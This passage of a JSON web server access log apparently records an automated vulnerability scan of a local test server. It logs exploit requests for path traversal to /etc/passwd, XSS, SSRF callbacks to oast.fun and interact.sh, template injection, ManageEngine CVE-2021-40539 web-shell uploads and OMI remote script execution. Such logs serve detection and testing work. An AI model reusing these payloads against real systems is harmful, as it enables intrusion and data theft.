HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/oembed/1.0/proxy?url=http://c9v8h8gsmpv8c1qg07h0bqzqg7o7fo39k.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.674","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"{\x22hapi\x22:{\x22username\x22:\x22Administrator\x22,\x22password\x22:\x22any_password\x22,\x22language\x22:\x22en\x22,\x22mode\x22:\x22gui\x22, \x22usesshkey\x22:true, \x22privatekey\x22:\x22any_privateky\x22, \x22passphrase\x22:\x22any_passphase\x22,\x22settings\x22:{\x22output_filter\x22:\x22passed\x22,\x22port_number\x22:\x22444\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /session/create HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"[{\x22query\x22:\x22query {\x5Cn __typename \x5Cn }\x22}, {\x22query\x22:\x22mutation { \x5Cn __typename \x5Cn }\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"action=verify-haras","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/rpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /him/api/rest/V1.0/system/log/list?filePath=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=probes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/lifterlms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/automerge.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"DEBUG /Foobar-debug.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"DEBUG", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dwr/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--8b1ab266c41afb773af2e064bc526458\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22ws.jsp\x22\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2021-40539\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A--8b1ab266c41afb773af2e064bc526458--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/docker.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/login/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /MUP/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"127.0.0.1/MUP", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-----------------------------5825462663702204104870787337\x0D\x0AContent-Disposition: form-data; name=\x22employee_ID\x22; filename=\x22poc.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------5825462663702204104870787337--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/uploadID.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22methodToCall\x22\x0D\x0A\x0D\x0Aunspecified\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22Save\x22\x0D\x0A\x0D\x0Ayes\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22form\x22\x0D\x0A\x0D\x0Asmartcard\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22operation\x22\x0D\x0A\x0D\x0AAdd\x0D\x0A--43992a07d9a30213782780204a9f032b\x0D\x0AContent-Disposition: form-data; name=\x22CERTIFICATE_PATH\x22; filename=\x22Si.class\x22\x0D\x0A\x0D\x0A\xCA\xFE\xBA\xBE\x00\x00\x004\x00(\x0D\x0A\x00\x0C\x00\x16\x0D\x0A\x00\x17\x00\x18\x07\x00\x19\x08\x00\x1A\x08\x00\x1B\x08\x00\x1C\x08\x00\x1D\x08\x00\x1E\x0D\x0A\x00\x17\x00\x1F\x07\x00 \x07\x00!\x07\x00\x22\x01\x00\x06\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0FLineNumberTable\x01\x00\x08\x01\x00\x0D\x0AStackMapTable\x07\x00 \x01\x00\x0D\x0ASourceFile\x01\x00\x07Si.java\x0C\x00\x0D\x0A\x00\x0E\x07\x00#\x0C\x00$\x00%\x01\x00\x10java/lang/String\x01\x00\x03cmd\x01\x00\x02/c\x01\x00\x04copy\x01\x00\x06ws.jsp\x01\x00*..\x5Cwebapps\x5Cadssp\x5Chelp\x5Cadmin-guide\x5Ctest.jsp\x0C\x00&\x00'\x01\x00\x13java/io/IOException\x01\x00\x02Si\x01\x00\x10java/lang/Object\x01\x00\x11java/lang/Runtime\x01\x00\x0D\x0AgetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x00!\x00\x0B\x00\x0C\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0D\x0A\x00\x0E\x00\x01\x00\x0F\x00\x00\x00\x1D\x00\x01\x00\x01\x00\x00\x00\x05*\xB7\x00\x01\xB1\x00\x00\x00\x01\x00\x10\x00\x00\x00\x06\x00\x01\x00\x00\x00\x02\x00\x08\x00\x11\x00\x0E\x00\x01\x00\x0F\x00\x00\x00d\x00\x05\x00\x02\x00\x00\x00+\xB8\x00\x02K*\x08\xBD\x00\x03Y\x03\x12\x04SY\x04\x12\x05SY\x05\x12\x06SY\x06\x12\x07SY\x07\x12\x08S\xB6\x00\x09L\xA7\x00\x04K\xB1\x00\x01\x00\x00\x00&\x00)\x00\x0D\x0A\x00\x02\x00\x10\x00\x00\x00\x12\x00\x04\x00\x00\x00\x05\x00\x04\x00\x06\x00&\x00\x07\x00*\x00\x08\x00\x12\x00\x00\x00\x07\x00\x02i\x07\x00\x13\x00\x00\x01\x00\x14\x00\x00\x00\x02\x00\x15\x0D\x0A--43992a07d9a30213782780204a9f032b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/admin/Index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.227","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMA/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.227","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect-to?url=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"Name=admin&Pass=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /manager/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"\x0D\x0A \x0D\x0A HTTP://127.0.0.1/wsman/\x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\x0D\x0A \x0D\x0A http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\x0D\x0A \x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\x0D\x0A 102400\x0D\x0A uuid:00B60932-CC01-0005-0000-000000010000\x0D\x0A PT1M30S\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A root/scx\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A aWQ=\x0D\x0A \x0D\x0A 0\x0D\x0A true\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wsman HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.231","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) 